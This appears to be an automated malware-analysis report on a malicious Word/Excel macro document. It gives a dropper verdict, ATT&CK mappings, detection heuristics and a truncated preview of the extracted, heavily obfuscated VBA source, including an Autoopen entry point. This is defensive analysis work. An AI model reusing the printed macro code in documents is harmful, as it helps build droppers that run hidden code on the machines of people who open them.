Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains VBA macros with AutoOpen and Shell() calls, indicating an attempt to execute arbitrary code. ClamAV detection as 'Doc.Dropper.Agent-6520242-0' further confirms its malicious nature. The VBA code is heavily obfuscated, but the presence of execution-related functions strongly suggests it acts as a dropper for a secondary payload.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6520242-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6520242-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58224 bytes |

SHA-256 of macros.bas: cbb54b1fa7e07a841975d19e71cec9b59e033971e6b3fae4400c69915f6a60f1

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "uwckDKOShc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub sGKio(iQkpm)
Select Case PBBCR
Case 9126
ROjLr = RiljE
ZiPwRj = Round(30796)
iYtddv = Hex(pllzw - ChrW(tJGIuT))
WXskf = NdAEk
Case 36472
QisVF = CByte(66610)
ucsAiI = Log(fYJnWQ)
End Select
End Sub
Sub RLjJwP(mpjAiu)
Select Case KRkDL
Case 45356
uirBXY = FrQNCJ
XLLHTO = Round(15030)
MzDNUV = Hex(YkKsO - ChrW(joHar))
hzQnb = WmFZvs
Case 17500
HSrzJ = CByte(8343)
zTfCK = Log(brXDhc)
End Select
Select Case aowMb
Case 55093
iCwpRj = PNwJRm
jikkRp = Round(90370)
iVOQuv = Hex(WfVjG - ChrW(uUqkaD))
dauPp = qJLcKm
Case 5064
UdaBow = CByte(93970)
RnkfJo = Log(TzrMj)
End Select
Select Case HbwbT
Case 9012
KCLuE = aqPjlG
mIGfJ = Round(33348)
zScSz = Hex(VMCcZ - ChrW(snjPb))
bSOTdP = jUizV
Case 36678
CCJsZ = CByte(87060)
kVOonJ = Log(OaGsi)
End Select
End Sub
Sub hznfoM(TzrMj)
Select Case ISpin
Case 79312
vrwAfq = pStXG
dkDPiD = Round(25374)
bliBHi = Hex(wZwSD - ChrW(tqCmAw))
XBFTF = fXOZAk
Case 53945
UFSzX = CByte(23156)
qswED = Log(ktBcdF)
End Select
Select Case IZfKv
Case 34465
djzwib = Ykjndm
hIJPC = Round(90215)
dNwWiV = Hex(uaIDFN - ChrW(HtzVbB))
JRpAS = bRWvs
Case 44250
zVCaE = CByte(12116)
dKakXZ = Log(ZPJtbt)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case UvHVLQ
Case 34657
DNKiJb = qZRVBh
qEctiB = Round(4813)
BRdUf = Hex(vFsqhA - ChrW(NZpPw))
YkbFrB = FCsSl
Case 31367
qLtEpw = CByte(21408)
TZfThs = Log(fnifNd)
End Select
uFljYwLzRth (aLmSJU + sXCUnwNkvpbs + MZERZP)
Select Case jlZCd
Case 56286
BaXUc = XFnFDw
lhSXm = Round(81178)
HzaCH = Hex(bzBEdj - ChrW(MYlOz))
sUHmwO = BQzSCP
Case 75604
JBzVN = CByte(245)
YDjcT = Log(BMwEZF)
End Select
End Sub
Sub izNcni(KAjCNw)
Select Case DWlsjj
Case 85220
EDWujA = COcKq
JoXhjY = Round(80455)
UjOXV = Hex(qLMqYE - ChrW(vKFtzb))
zVZDG = tiNKAH
Case 4771
jWHXK = CByte(3639)
rCmll = Log(OdRol)
End Select
Select Case iazGLR
Case 74479
HzBpQ = MLowW
ZtFTnR = Round(40507)
fEvVOJ = Hex(wkPvF - ChrW(zFuAw))
isCpT = wYpVj
Case 37355
wJZDBj = CByte(51210)
iOaZC = Log(ObnLS)
End Select
Select Case wmkcOc
Case 5559
lidEv = JOXCs
WNzic = Round(31566)
CjwCK = Hex(czJZw - ChrW(ZdKVEl))
dBGAD = SwUimF
Case 507
MAjobS = CByte(83858)
DzpbO = Log(qLsvs)
End Select
End Sub
Sub nOvjs(rOHPX)
Select Case wqNci
Case 63580
SiKwHK = WAIIqr
uLzEw = Round(91604)
bdLoc = Hex(iYFNh - ChrW(SabcP))
YQurFw = fFCiP
Case 45938
lSqAzK = CByte(59199)
wwvubf = Log(nSihQ)
End Select
End Sub
Attribute VB_Name = "fQkXMPwQbt"
Sub pzZAja(FJkRvv)
Select Case XtGSk
Case 92401
HJFCGd = viXWFF
bFZDr = Round(9087)
HnNUoL = Hex(VqzrzH - ChrW(pTwdzr))
bMvqp = vohPt
Case 8
... (truncated)